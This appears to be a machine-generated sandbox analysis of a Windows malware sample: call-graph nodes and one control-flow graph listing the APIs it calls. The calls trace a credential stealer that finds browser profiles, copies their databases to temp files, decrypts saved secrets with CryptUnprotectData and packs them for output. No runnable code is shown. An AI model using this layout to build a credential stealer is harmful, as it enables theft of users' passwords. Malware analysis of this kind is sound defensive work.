27313 e02e10 27310->27313 27311->27312 27314 e02d72 GetPrivateProfileIntW 27311->27314 27312->27302 27312->27304 27315 e01011 3 API calls 27313->27315 27314->27304 27315->27293 27316->27304 27317->27304 27318->27297 27319->27299 27933 e178b9 32 API calls 28032 e212bb _allmul _allmul _allmul _alldvrm _allmul 27934 e213ca 85 API calls 28034 e213ca 87 API calls 28035 e096bc _alldiv _alldiv _alldiv _alldiv _allmul 28037 e10284 37 API calls 27937 e4348f 27 API calls 27679 e03098 27680 e01b6a 2 API calls 27679->27680 27682 e030af 27680->27682 27681 e033a9 27682->27681 27703 e01000 GetProcessHeap RtlAllocateHeap 27682->27703 27684 e030ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27685 e54bec 87 API calls 27684->27685 27688 e03126 27685->27688 27686 e0339b DeleteFileW 27687 e01011 3 API calls 27686->27687 27687->27681 27688->27686 27689 e03392 27688->27689 27691 e202ec 92 API calls 27688->27691 27690 e53848 74 API calls 27689->27690 27690->27686 27701 e03155 27691->27701 27692 e03381 27705 e1fb92 91 API calls 27692->27705 27694 e0319c RtlCompareMemory 27695 e032cd CryptUnprotectData 27694->27695 27694->27701 27695->27701 27696 e202ec 92 API calls 27696->27701 27697 e031d0 RtlZeroMemory 27704 e01000 GetProcessHeap RtlAllocateHeap 27697->27704 27699 e01fa7 19 API calls 27699->27701 27700 e01011 3 API calls 27700->27701 27701->27692 27701->27694 27701->27695 27701->27696 27701->27697 27701->27699 27701->27700 27702 e01798 lstrlen 27701->27702 27702->27701 27703->27684 27704->27701 27705->27689 28042 e16698 29 API calls 27941 e42c9e 102 API calls 28043 e0629a 23 API calls 27943 e42864 25 API calls 28049 e33e6b 20 API calls 27945 e1f86a 30 API calls 27946 e04c6d 17 API calls 28050 e20670 _allmul _allmul _allmul _alldvrm 27948 e26871 8 API calls 28051 e26e71 20 API calls 27952 e5507d 24 API calls 27953 e0b079 20 API calls 27955 e1807c 23 API calls 27465 e03c40 27466 e01b6a 2 API calls 27465->27466 27467 e03c50 27466->27467 27468 e03dfa 27467->27468 27501 e01000 GetProcessHeap RtlAllocateHeap 27467->27501 27470 e03c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27502 e54bec 27470->27502 27472 e03dec DeleteFileW 27473 e01011 3 API calls 27472->27473 27473->27468 27474 e03c9a 27474->27472 27475 e03de3 27474->27475 27513 e01000 GetProcessHeap RtlAllocateHeap 27474->27513 27476 e53848 74 API calls 27475->27476 27476->27472 27478 e03cce 27479 e202ec 92 API calls 27478->27479 27494 e03cd9 27479->27494 27480 e03da8 27515 e1fb92 91 API calls 27480->27515 27482 e03db1 lstrlen 27483 e03db9 27482->27483 27484 e03ddc 27482->27484 27516 e01798 lstrlen 27483->27516 27485 e01011 3 API calls 27484->27485 27485->27475 27486 e01fa7 19 API calls 27486->27494 27488 e03dc8 27517 e01798 lstrlen 27488->27517 27489 e03d2b lstrlen 27491 e03d35 lstrlen 27489->27491 27489->27494 27491->27494 27492 e03dd2 27518 e01798 lstrlen 27492->27518 27493 e202ec 92 API calls 27493->27494 27494->27480 27494->27486 27494->27489 27494->27493 27514 e01000 GetProcessHeap RtlAllocateHeap 27494->27514 27497 e03d46 wsprintfA lstrlen 27498 e03d71 27497->27498 27499 e03d83 lstrcat 27497->27499 27498->27499 27500 e01011 3 API calls 27499->27500 27500->27494 27501->27470 27519 e5307c 27502->27519 27504 e54c01 27511 e54c44 27504->27511 27529 e1c54d memset 27504->27529 27506 e54c18 27530 e1c871 21 API calls 27506->27530 27508 e54c2a 27531 e1c518 19 API calls 27508->27531 27510 e54c33 27510->27511 27532 e5486f 87 API calls 27510->27532 27511->27474 27513->27478 27514->27497 27515->27482 27516->27488 27517->27492 27518->27484 27520 e53095 27519->27520 27521 e5308e 27519->27521 27522 e530ad 27520->27522 27546 e066ce 17 API calls 27520->27546 27521->27504 27522->27521 27524 e530ed memset 27522->27524 27525 e53108 27524->27525 27526 e53116 27525->27526 27547 e0c59d 17 API calls 27525->27547 27526->27521 27533 e06512 27526->27533 27529->27506 27530->27508 27531->27510 27532->27511 27548 e0685c 27533->27548 27535 e0651d 27535->27521 27536 e06519 27536->27535 27537 e0bfec GetSystemInfo 27536->27537 27551 e065bd 27537->27551 27539 e0c00e 27540 e065bd 16 API calls 27539->27540 27541 e0c01a 27540->27541 27542 e065bd 16 API calls 27541->27542 27543 e0c026 27542->27543 27544 e065bd 16 API calls 27543->27544 27545 e0c032 27544->27545 27545->27521 27546->27522 27547->27526 27549 e5307c 17 API calls 27548->27549 27550 e06861 27549->27550 27550->27536 27552 e5307c 17 API calls 27551->27552 27553 e065c2 27552->27553 27553->27539 27957 e04440 24 API calls 28053 e69238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 27958 e26440 92 API calls 28055 e213ca 100 API calls 27960 e47452 19 API calls 28057 e05e5a 28 API calls 27730 e0105d VirtualFree 27963 e3e024 91 API calls 27966 e0482b 14 API calls 27245 e0f433 27246 e0f445 27245->27246 27251 e123b9 27246->27251 27248 e0f47c 27250 e0f490 27248->27250 27259 e0e206 56 API calls 27248->27259 27252 e123d3 27251->27252 27254 e12473 27251->27254 27255 e12431 27252->27255 27263 e13451 41 API calls 27252->27263 27254->27248 27255->27254 27260 e063f7 27255->27260 27257 e1240f 27257->27255 27264 e1235a 17 API calls 27257->27264 27259->27250 27265 e0bafc 27260->27265 27261 e06400 27261->27254 27263->27257 27264->27255 27276 e0b609 27265->27276 27267 e0bb1a 27267->27261 27268 e0bb3f GetFileAttributesW 27269 e0bb4b 27268->27269 27272 e0bb14 27268->27272 27271 e0bb5b 27269->27271 27273 e0bb7d 27269->27273 27270 e0bb25 DeleteFileW 27270->27272 27270->27273 27279 e0a1c6 18 API calls 27271->27279 27272->27267 27272->27268 27272->27270 27272->27271 27280 e0a2aa 17 API calls 27273->27280 27281 e0a08a 27276->27281 27278 e0b60f 27278->27272 27279->27267 27280->27267 27282 e0a0a4 27281->27282 27283 e0a0aa 27282->27283 27285 e06a81 27282->27285 27283->27278 27286 e06a8f 27285->27286 27287 e06aa4 27286->27287 27288 e06a95 memset 27286->27288 27287->27283 27288->27287 27970 e1943d 33 API calls 28063 e0ca01 _allmul _alldiv _allmul _alldiv 27971 e39000 28 API calls 27974 e45401 memset memcpy memcpy memset memcpy 27563 e04406 27564 e02e30 22 API calls 27563->27564 27565 e04429 27564->27565 27566 e02e30 22 API calls 27565->27566 27567 e0443a 27566->27567 27578 e0a40e 27580 e0a426 27578->27580 27582 e0a4a2 27578->27582 27579 e0a469 memcpy 27579->27582 27580->27579 27581 e0a44a memcpy 27580->27581 27580->27582 27589 e0a45d 27581->27589 27583 e0a524 27582->27583 27587 e0a501 27582->27587 27591 e0a2aa 17 API calls 27583->27591 27585 e0a532 27586 e0a53e memset 27585->27586 27585->27589 27586->27589 27590 e0a1c6 18 API calls 27587->27590 27590->27589 27591->27585 28066 e20e0c 22 API calls 28069 e2f21c 23 API calls 27978 e0581f _alldiv _allrem _allmul 27979 e099e1 strncmp 27980 e0c9ea _allmul _alldiv 27982 e555eb IsProcessorFeaturePresent 27984 e049f1 13 API calls 28072 e213ca 70 API calls 28073 e19ff0 31 API calls 27985 e0d1f7 memset _allmul _allmul 27446 e047fa 27453 e0479c 27446->27453 27449 e0479c 23 API calls 27450 e04813 27449->27450 27451 e0479c 23 API calls 27450->27451 27452 e0481f 27451->27452 27454 e01afe 10 API calls 27453->27454 27455 e047af 27454->27455 27456 e047f1 27455->27456 27457 e0199d 9 API calls 27455->27457 27456->27449 27459 e047bf 27457->27459 27458 e047ea 27460 e01011 3 API calls 27458->27460 27459->27458 27461 e01d4a 18 API calls 27459->27461 27460->27456 27461->27459 28076 e373c4 22 API calls 27571 e09fc8 27572 e09fd8 27571->27572 27574 e09fd3 27571->27574 27573 e09ff4 HeapCreate 27572->27573 27572->27574 27573->27574 27575 e0a004 27573->27575 27577 e07f70 17 API calls 27575->27577 27577->27574 28079 e213ca 87 API calls 27986 e53dc8 24 API calls 27706 e043d9 27713 e04317 _alloca_probe RegOpenKeyW 27706->27713 27709 e04317 25 API calls 27710 e043f5 27709->27710 27711 e04317 25 API calls 27710->27711 27712 e04403 27711->27712 27714 e04343 RegEnumKeyExW 27713->27714 27715 e043cf 27713->27715 27716 e043c4 RegCloseKey 27714->27716 27720 e0436d 27714->27720 27715->27709 27716->27715 27717 e01953 6 API calls 27717->27720 27718 e0199d 9 API calls 27718->27720 27720->27717 27720->27718 27721 e01011 3 API calls 27720->27721 27724 e0418a 16 API calls 27720->27724 27722 e0439b RegEnumKeyExW 27721->27722 27722->27720 27723 e043c3 27722->27723 27723->27716 27724->27720 28081 e0ebd9 35 API calls 27731 e015dd 27732 e01600 27731->27732 27733 e015f3 lstrlen 27731->27733 27742 e01000 GetProcessHeap RtlAllocateHeap 27732->27742 27733->27732 27735 e01608 lstrcat 27736 e01644 27735->27736 27737 e0163d lstrcat 27735->27737 27743 e01333 27736->27743 27737->27736 27740 e01011 3 API calls 27741 e01667 27740->27741 27742->27735 27766 e01000 GetProcessHeap RtlAllocateHeap 27743->27766 27745 e01357 27767 e0106c lstrlen MultiByteToWideChar 27745->27767 27747 e01366 27768 e012a3 RtlZeroMemory 27747->27768 27750 e013b8 RtlZeroMemory 27754 e013ed 27750->27754 27751 e01011 3 API calls 27752 e015d2 27751->27752 27752->27740 27753 e015b5 27753->27751 27754->27753 27770 e01000 GetProcessHeap RtlAllocateHeap 27754->27770 27756 e014a7 wsprintfW 27758 e014c9 27756->27758 27757 e015a1 27759 e01011 3 API calls 27757->27759 27758->27757 27771 e01000 GetProcessHeap RtlAllocateHeap 27758->27771 27759->27753 27761 e01533 27762 e0159a 27761->27762 27772 e0104c VirtualAlloc 27761->27772 27764 e01011 3 API calls 27762->27764 27764->27757 27765 e0158a RtlMoveMemory 27765->27762 27766->27745 27767->27747 27769 e012c5 27768->27769 27769->27750 27769->27753 27770->27756 27771->27761 27772->27765 27773 e063dd 27776 e0b87b 27773->27776 27774 e063f4 27777 e0b88d memset 27776->27777 27783 e0b8e5 27777->27783 27779 e0b609 memset 27779->27783 27780 e0ba3c 27780->27774 27783->27777 27783->27779 27783->27780 27784 e0ba14 27783->27784 27788 e0ba41 27783->27788 27790 e0b64b 18 API calls 27783->27790 27791 e0bb9f 18 API calls 27783->27791 27792 e0a2aa 17 API calls 27783->27792 27793 e0a1c6 18 API calls 27784->27793 27786 e0ba32 27794 e54db2 17 API calls 27786->27794 27795 e552ae 27788->27795 27790->27783 27791->27783 27792->27783 27793->27786 27794->27780 27796 e552bb 27795->27796 27798 e552d1 27796->27798 27799 e3ba08 _allmul 27796->27799 27798->27780 27799->27798 27989 e111a0 41 API calls 28082 e28ba6 7 API calls 28083 e453ad memset memcpy memset memcpy 28084 e433b7 27 API calls 27991 e29dbc 25 API calls 28085 e213ca 87 API calls 27992 e27d8b _allrem memcpy 28089 e1ab8b 19 API calls 28090 e1cb91 18 API calls 27994 e1fd97 19 API calls 28091 e213ca 86 API calls 27995 e01198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28093 e0bf9a _alldiv 27800 e01b9d 27801 e01bc1 27800->27801 27802 e01ba2 27800->27802 27802->27801 27803 e01ba9 GetFileAttributesW 27802->27803 27804 e01bb5 27803->27804 27805 e0639e 27809 e0b1e5 27805->27809 27829 e0b1e3 27805->27829 27806 e063b2 27810 e0b20d 27809->27810 27813 e0b214 27809->27813 27863 e0aeea 27810->27863 27812 e0b233 27815 e0b28f 27812->27815 27849 e0a7ae 27812->27849 27813->27812 27813->27815 27881 e0ae65 27813->27881 27815->27806 27817 e0b26d 27887 e0a1c6 18 API calls 27817->27887 27818 e0b2d6 27860 e06a5a 27818->27860 27824 e0b310 CreateFileMappingW 27825 e0b32b MapViewOfFile 27824->27825 27826 e0b37e 27824->27826 27825->27826 27827 e0b2e8 27825->27827 27888 e0a1c6 18 API calls 27826->27888 27827->27815 27827->27824 27830 e0b1e5 27829->27830 27831 e0b214 27830->27831 27832 e0aeea 25 API calls 27830->27832 27833 e0b233 27831->27833 27834 e0ae65 21 API calls 27831->27834 27835 e0b28f 27831->27835 27832->27831 27833->27835 27836 e0a7ae 18 API calls 27833->27836 27834->27833 27835->27806 27840 e0b267 27836->27840 27837 e0b26d 27912 e0a1c6 18 API calls 27837->27912 27838 e0b2d6 27839 e06a5a 17 API calls 27838->27839 27847 e0b2e8 27839->27847 27840->27835 27840->27837 27840->27838 27842 e0a67c 21 API calls 27840->27842 27843 e0b2be 27842->27843 27843->27837 27843->27838 27844 e0b310 CreateFileMappingW 27845 e0b32b MapViewOfFile 27844->27845 27846 e0b37e 27844->27846 27845->27846 27845->27847 27913 e0a1c6 18 API calls 27846->27913 27847->27835 27847->27844 27851 e0a7c7 27849->27851 27850 e0a805 27850->27815 27850->27817 27850->27818 27853 e0a67c 27850->27853 27851->27850 27889 e0a1c6 18 API calls 27851->27889 27854 e0a694 _alldiv _allmul 27853->27854 27855 e0a6c1 27853->27855 27854->27855 27890 e0a33b SetFilePointer 27855->27890 27859 e0a6ee 27859->27817 27859->27818 27861 e5307c 17 API calls 27860->27861 27862 e06a65 27861->27862 27862->27827 27864 e06a81 memset 27863->27864 27865 e0af01 27864->27865 27866 e06a81 memset 27865->27866 27880 e0af07 27865->27880 27867 e0af2a 27866->27867 27867->27880 27896 e07f07 27867->27896 27869 e552ae _allmul 27871 e0afd9 27869->27871 27870 e0af54 27870->27869 27870->27880 27872 e0b87b 20 API calls 27871->27872 27873 e0affa 27872->27873 27874 e0b020 27873->27874 27875 e0b000 27873->27875 27876 e0ae65 21 API calls 27874->27876 27904 e0a1c6 18 API calls 27875->27904 27878 e0b01c 27876->27878 27878->27880 27899 e0adcc 27878->27899 27880->27813 27882 e0ae7a 27881->27882 27883 e0ae83 27882->27883 27884 e0a67c 21 API calls 27882->27884 27883->27812 27885 e0aea5 27884->27885 27885->27883 27911 e0a1c6 18 API calls 27885->27911 27887->27815 27888->27815 27889->27850 27891 e0a390 27890->27891 27892 e0a36a 27890->27892 27891->27859 27894 e0a1c6 18 API calls 27891->27894 27892->27891 27895 e0a1c6 18 API calls 27892->27895 27894->27859 27895->27891 27905 e07ec7 27896->27905 27901 e0ade4 27899->27901 27900 e0ae5f 27900->27880 27901->27900 27903 e0bafc 20 API calls 27901->27903 27910 e0a39e 18 API calls 27901->27910 27903->27901 27904->27878 27906 e07ed4 27905->27906 27907 e07ed9 27905->27907 27906->27870 27909 e06e6a 17 API calls 27907->27909 27909->27906 27910->27901 27911->27883 27912->27835 27913->27835 28094 e37762 memset memset memcpy 27052 e04164 27055 e04045 27052->27055 27074 e03fdc 27055->27074 27058 e03fdc 50 API calls 27059 e0407a 27058->27059 27060 e03fdc 50 API calls 27059->27060 27061 e0408d 27060->27061 27062 e03fdc 50 API calls 27061->27062 27063 e040a0 27062->27063 27064 e03fdc 50 API calls 27063->27064 27065 e040b3 27064->27065 27066 e03fdc 50 API calls 27065->27066 27067 e040c6 27066->27067 27068 e03fdc 50 API calls 27067->27068 27069 e040d9 27068->27069 27070 e03fdc 50 API calls 27069->27070 27071 e040ec 27070->27071 27072 e03fdc 50 API calls 27071->27072 27073 e040ff 27072->27073 27085 e01afe 27074->27085 27077 e0403f 27077->27058 27082 e04038 27148 e01011 27082->27148 27153 e01000 GetProcessHeap RtlAllocateHeap 27085->27153 27087 e01b0d SHGetFolderPathW 27088 e01b20 27087->27088 27089 e01b63 27087->27089 27090 e01011 3 API calls 27088->27090 27089->27077 27093 e0199d 27089->27093 27092 e01b28 27090->27092 27092->27089 27154 e019e5 27092->27154 27169 e01953 27093->27169 27095 e019a6 27096 e01011 3 API calls 27095->27096 27097 e019af 27096->27097 27098 e03ed9 27097->27098 27099 e03fd1 27098->27099 27100 e03eed 27098->27100 27099->27082 27120 e01d4a 27099->27120 27100->27099 27175 e01000 GetProcessHeap RtlAllocateHeap 27100->27175 27102 e03f01 PathCombineW FindFirstFileW 27103 e03f27 27102->27103 27104 e03fca 27102->27104 27105 e03f32 lstrcmpiW 27103->27105 27106 e03f78 lstrcmpiW 27103->27106 27176 e01000 GetProcessHeap RtlAllocateHeap 27103->27176 27107 e01011 3 API calls 27104->27107 27108 e03faf FindNextFileW 27105->27108 27109 e03f42 lstrcmpiW 27105->27109 27106->27103 27106->27108 27107->27099 27108->27103 27111 e03fc3 FindClose 27108->27111 27109->27108 27112 e03f56 27109->27112 27111->27104 27193 e01000 GetProcessHeap RtlAllocateHeap 27112->27193 27113 e03f92 PathCombineW 27177 e03e04 27113->27177 27116 e03f60 PathCombineW 27117 e03ed9 23 API calls 27116->27117 27118 e03f76 27117->27118 27119 e01011 3 API calls 27118->27119 27119->27108 27121 e01d62 27120->27121 27122 e01eb4 27120->27122 27121->27122 27226 e019b4 27121->27226 27122->27082 27125 e01d79 27128 e01953 6 API calls 27125->27128 27126 e01d8b 27127 e01953 6 API calls 27126->27127 27129 e01d83 27127->27129 27128->27129 27129->27122 27130 e01da3 FindFirstFileW 27129->27130 27131 e01ead 27130->27131 27138 e01dba 27130->27138 27132 e01011 3 API calls 27131->27132 27132->27122 27133 e01dc5 lstrcmpiW 27135 e01ddd lstrcmpiW 27133->27135 27136 e01e8e FindNextFileW 27133->27136 27134 e01953 6 API calls 27134->27138 27135->27136 27145 e01df5 27135->27145 27137 e01ea2 FindClose 27136->27137 27136->27138 27137->27131 27138->27133 27138->27134 27139 e0199d 9 API calls 27138->27139 27141 e01e54 lstrcmpiW 27139->27141 27140 e019b4 lstrlenW 27140->27145 27141->27145 27142 e01011 3 API calls 27142->27136 27144 e01953 6 API calls 27144->27145 27145->27140 27145->27142 27145->27144 27146 e0199d 9 API calls 27145->27146 27147 e01d4a 12 API calls 27145->27147 27230 e01cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27145->27230 27146->27145 27147->27145 27231 e01162 VirtualQuery 27148->27231 27151 e0102d 27151->27077 27152 e0101d GetProcessHeap RtlFreeHeap 27152->27151 27153->27087 27155 e019f7 27154->27155 27156 e019fa RegOpenKeyExW 27154->27156 27155->27156 27157 e01aa2 27156->27157 27158 e01a28 RegQueryValueExW 27156->27158 27161 e01ab9 27157->27161 27162 e019e5 5 API calls 27157->27162 27159 e01a94 RegCloseKey 27158->27159 27160 e01a46 27158->27160 27159->27157 27159->27161 27160->27159 27168 e01000 GetProcessHeap RtlAllocateHeap 27160->27168 27161->27092 27162->27161 27164 e01a61 RegQueryValueExW 27165 e01a8b 27164->27165 27166 e01a7f 27164->27166 27167 e01011 3 API calls 27165->27167 27166->27159 27167->27166 27168->27164 27170 e01964 lstrlenW lstrlenW 27169->27170 27174 e01000 GetProcessHeap RtlAllocateHeap 27170->27174 27173 e01986 lstrcatW lstrcatW 27173->27095 27174->27173 27175->27102 27176->27113 27194 e01b6a 27177->27194 27179 e03e0f 27184 e03ec7 27179->27184 27200 e01c31 CreateFileW 27179->27200 27184->27118 27187 e03ebf 27188 e01011 3 API calls 27187->27188 27188->27184 27189 e03ea8 27192 e01011 3 API calls 27189->27192 27190 e03e6c RtlCompareMemory 27190->27189 27191 e03e7e CryptUnprotectData 27190->27191 27191->27189 27192->27187 27193->27116 27195 e01b99 27194->27195 27196 e01b6f 27194->27196 27195->27179 27196->27195 27197 e01b76 CreateFileW 27196->27197 27198 e01b95 27197->27198 27199 e01b8d CloseHandle 27197->27199 27198->27179 27199->27198 27201 e01c53 GetFileSize 27200->27201 27202 e01c98 27200->27202 27203 e01c90 CloseHandle 27201->27203 27204 e01c63 27201->27204 27202->27184 27211 e02fb1 27202->27211 27203->27202 27223 e01000 GetProcessHeap RtlAllocateHeap 27204->27223 27206 e01c6b ReadFile 27207 e01c80 27206->27207 27208 e01c87 27206->27208 27207->27203 27207->27208 27209 e01011 3 API calls 27208->27209 27210 e01c8e 27209->27210 27210->27203 27212 e02ff2 27211->27212 27213 e02fb8 StrStrIA 27211->27213 27212->27184 27217 e0123b lstrlen 27212->27217 27213->27212 27214 e02fcd lstrlen StrStrIA 27213->27214 27214->27212 27215 e02fe7 27214->27215 27224 e0190b 6 API calls 27215->27224 27218 e01256 CryptStringToBinaryA 27217->27218 27219 e0129b 27217->27219 27218->27219 27220 e01272 27218->27220 27219->27187 27219->27189 27219->27190 27225 e01000 GetProcessHeap RtlAllocateHeap 27220->27225 27222 e0127e CryptStringToBinaryA 27222->27219 27223->27206 27224->27212 27225->27222 27227 e019bc 27226->27227 27229 e019d4 27226->27229 27228 e019c3 lstrlenW 27227->27228 27227->27229 27228->27229 27229->27125 27229->27126 27230->27145 27232 e01019 27231->27232 27232->27151 27232->27152 28096 e27f67 23 API calls 28097 e0ab68 21 API calls 27997 e35d6f 20 API calls 27998 e1a16f 32 API calls 27323 e02f77 27328 e02e30 StrStrIW 27323->27328 27326 e02e30 22 API calls 27327 e02fab 27326->27327 27329 e02e57 27328->27329 27330 e02ebc 27328->27330 27331 e019e5 9 API calls 27329->27331 27354 e01000 GetProcessHeap RtlAllocateHeap 27330->27354 27333 e02e68 27331->27333 27333->27330 27355 e01bc5 10 API calls 27333->27355 27334 e02ed0 RegOpenKeyExW 27335 e02f68 27334->27335 27336 e02eee 27334->27336 27338 e01011 3 API calls 27335->27338 27337 e02f50 RegEnumKeyExW 27336->27337 27344 e01953 6 API calls 27336->27344 27348 e0199d 9 API calls 27336->27348 27351 e02e30 18 API calls 27336->27351 27353 e01011 3 API calls 27336->27353 27337->27336 27340 e02f5e RegCloseKey 27337->27340 27341 e02f6f 27338->27341 27340->27335 27341->27326 27342 e02e75 27343 e02eb5 27342->27343 27345 e01afe 10 API calls 27342->27345 27346 e01011 3 API calls 27343->27346 27344->27336 27347 e02e83 27345->27347 27346->27330 27349 e02e91 27347->27349 27350 e0199d 9 API calls 27347->27350 27348->27336 27352 e01011 3 API calls 27349->27352 27350->27349 27351->27336 27352->27343 27353->27336 27354->27334 27355->27342 28001 e1c97b memcpy 28099 e26340 90 API calls 28002 e2e141 18 API calls 28101 e1f74d 18 API calls 28004 e0a558 18 API calls 28005 e2e558 22 API calls 28006 e09925 18 API calls 28105 e4c322 27 API calls 28008 e10128 34 API calls 28107 e0cb2a _allmul _allmul 28108 e3072d 19 API calls 28010 e2f130 22 API calls 28109 e1ff32 21 API calls 28011 e19534 38 API calls 28112 e17b3d 18 API calls 28114 e10f3e 58 API calls 28012 e16d01 _allmul 27554 e69304 27556 e69344 27554->27556 27555 e69584 27555->27555 27556->27555 27557 e694da LoadLibraryA 27556->27557 27560 e6951f VirtualProtect VirtualProtect 27556->27560 27558 e694f1 27557->27558 27558->27556 27561 e69503 GetProcAddress 27558->27561 27560->27555 27561->27558 27562 e69519 27561->27562 28117 e36f06 24 API calls 27568 e04108 27569 e04045 50 API calls 27568->27569 27570 e04118 27569->27570 28118 e25f08 100 API calls 27595 e02b15 27596 e01953 6 API calls 27595->27596 27597 e02b1f FindFirstFileW 27596->27597 27599 e02c5c 27597->27599 27618 e02b4e 27597->27618 27600 e01011 3 API calls 27599->27600 27602 e02c63 27600->27602 27601 e02b59 lstrcmpiW 27605 e02b71 lstrcmpiW 27601->27605 27606 e02c3d FindNextFileW 27601->27606 27603 e01011 3 API calls 27602->27603 27607 e02c6a 27603->27607 27604 e01953 6 API calls 27604->27618 27605->27606 27605->27618 27608 e02c51 FindClose 27606->27608 27606->27618 27608->27599 27609 e0199d 9 API calls 27611 e02bdf StrStrIW 27609->27611 27610 e019b4 lstrlenW 27610->27618 27612 e02c10 StrStrIW 27611->27612 27615 e02bf1 27611->27615 27612->27615 27613 e01cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27613->27615 27614 e01011 3 API calls 27614->27606 27615->27612 27615->27613 27615->27614 27620 e0278e 41 API calls 27615->27620 27617 e0199d 9 API calls 27617->27618 27618->27601 27618->27604 27618->27609 27618->27610 27618->27617 27619 e01011 3 API calls 27618->27619 27619->27618 27620->27612 28119 e26b14 memset memcpy _allmul 27621 e03717 27622 e01b6a 2 API calls 27621->27622 27625 e0372e 27622->27625 27623 e03c23 27625->27623 27671 e01000 GetProcessHeap RtlAllocateHeap 27625->27671 27626 e0376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27627 e037a8 27626->27627 27628 e0379e 27626->27628 27630 e54bec 87 API calls 27627->27630 27674 e0349b 31 API calls 27628->27674 27633 e037b3 27630->27633 27631 e03c15 DeleteFileW 27632 e01011 3 API calls 27631->27632 27632->27623 27633->27631 27634 e03c0c 27633->27634 27672 e01000 GetProcessHeap RtlAllocateHeap 27633->27672 27635 e53848 74 API calls 27634->27635 27635->27631 27637 e037e3 27638 e202ec 92 API calls 27637->27638 27655 e037ee 27638->27655 27639 e03bcc 27675 e1fb92 91 API calls 27639->27675 27641 e03bd9 lstrlen 27642 e03c05 27641->27642 27643 e03be5 27641->27643 27645 e01011 3 API calls 27642->27645 27676 e01798 lstrlen 27643->27676 27645->27634 27646 e03bf3 27677 e01798 lstrlen 27646->27677 27647 e03833 RtlCompareMemory 27648 e03a37 CryptUnprotectData 27647->27648 27647->27655 27648->27655 27649 e202ec 92 API calls 27649->27655 27651 e03bfc 27678 e01798 lstrlen 27651->27678 27653 e03867 RtlZeroMemory 27673 e01000 GetProcessHeap RtlAllocateHeap 27653->27673 27655->27639 27655->27647 27655->27648 27655->27649 27655->27653 27656 e01011 3 API calls 27655->27656 27657 e03b0f lstrlen 27655->27657 27659 e01000 GetProcessHeap RtlAllocateHeap 27655->27659 27660 e01fa7 19 API calls 27655->27660 27661 e02112 5 API calls 27655->27661 27662 e03987 lstrlen 27655->27662 27665 e03ba3 lstrcat 27655->27665 27666 e02112 5 API calls 27655->27666 27656->27655 27657->27655 27658 e03b21 lstrlen 27657->27658 27658->27655 27659->27655 27660->27655 27663 e03b66 wsprintfA lstrlen 27661->27663 27662->27655 27664 e03999 lstrlen 27662->27664 27663->27655 27663->27665 27664->27655 27665->27655 27667 e039de wsprintfA lstrlen 27666->27667 27668 e03a1b lstrcat 27667->27668 27669 e03a0d 27667->27669 27670 e01011 3 API calls 27668->27670 27669->27668 27670->27655 27671->27626 27672->27637 27673->27655 27674->27627 27675->27641 27676->27646 27677->27651 27678->27642 27725 e0411b 27726 e04045 50 API calls 27725->27726 27727 e0412b 27726->27727 27728 e04045 50 API calls 27727->27728 27729 e0413b 27728->27729 28017 e184a7 29 API calls

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 e03717-e03730 call e01b6a 3 e03736-e0374c 0->3 4 e03c37-e03c3d 0->4 5 e03762-e0379c call e01000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->5 6 e0374e-e0375e call e0302d 3->6 11 e037a8-e037b5 call e54bec 5->11 12 e0379e-e037a3 call e0349b 5->12 6->5 16 e03c15-e03c1e DeleteFileW call e01011 11->16 17 e037bb-e037d3 call e3eeb8 11->17 12->11 21 e03c23-e03c28 16->21 22 e037d9-e037f1 call e01000 call e202ec 17->22 23 e03c0c-e03c10 call e53848 17->23 21->4 24 e03c2a-e03c32 call e02ffa 21->24 31 e03bd0-e03be3 call e1fb92 lstrlen 22->31 32 e037f7 22->32 23->16 24->4 38 e03c05-e03c07 call e01011 31->38 39 e03be5-e03c00 call e01798 * 3 31->39 33 e037fc-e03816 call e01fa7 32->33 41 e03bb6-e03bc6 call e202ec 33->41 42 e0381c-e0382d 33->42 38->23 39->38 41->33 55 e03bcc 41->55 45 e03833-e03843 RtlCompareMemory 42->45 46 e03a37-e03a51 CryptUnprotectData 42->46 45->46 50 e03849-e0384b 45->50 46->41 48 e03a57-e03a5c 46->48 48->41 52 e03a62-e03a78 call e01fa7 48->52 50->46 54 e03851-e03856 50->54 61 e03a86-e03a9d call e01fa7 52->61 62 e03a7a-e03a80 52->62 54->46 58 e0385c-e03861 54->58 55->31 58->46 60 e03867-e038ed RtlZeroMemory call e01000 58->60 73 e038f3-e03909 call e01fa7 60->73 74 e03a2e-e03a32 60->74 68 e03aab-e03ac2 call e01fa7 61->68 69 e03a9f-e03aa5 61->69 62->61 64 e03a82 62->64 64->61 79 e03ad0-e03aed call e01fa7 68->79 80 e03ac4-e03aca 68->80 69->68 71 e03aa7 69->71 71->68 83 e03917-e0392d call e01fa7 73->83 84 e0390b-e03911 73->84 75 e03bb1 call e01011 74->75 75->41 90 e03af7-e03b01 79->90 91 e03aef-e03af1 79->91 80->79 82 e03acc 80->82 82->79 92 e0393b-e03952 call e01fa7 83->92 93 e0392f-e03935 83->93 84->83 86 e03913 84->86 86->83 95 e03b03-e03b05 90->95 96 e03b0f-e03b1b lstrlen 90->96 91->90 94 e03af3 91->94 103 e03960-e03979 call e01fa7 92->103 104 e03954-e0395a 92->104 93->92 97 e03937 93->97 94->90 95->96 99 e03b07-e03b0b 95->99 96->41 100 e03b21-e03b2a lstrlen 96->100 97->92 99->96 100->41 102 e03b30-e03b4f call e01000 100->102 110 e03b51 102->110 111 e03b59-e03b93 call e02112 wsprintfA lstrlen 102->111 113 e03987-e03993 lstrlen 103->113 114 e0397b-e03981 103->114 104->103 106 e0395c 104->106 106->103 110->111 118 e03ba3-e03baf lstrcat 111->118 119 e03b95-e03ba1 call e0102f 111->119 113->74 117 e03999-e039a2 lstrlen 113->117 114->113 115 e03983 114->115 115->113 117->74 120 e039a8-e039c7 call e01000 117->120 118->75 119->118 125 e039d1-e039d9 call e02112 120->125 126 e039c9 120->126 128 e039de-e03a0b wsprintfA lstrlen 125->128 126->125 129 e03a1b-e03a29 lstrcat call e01011 128->129 130 e03a0d-e03a19 call e0102f 128->130 129->74 130->129
                                                                        APIs
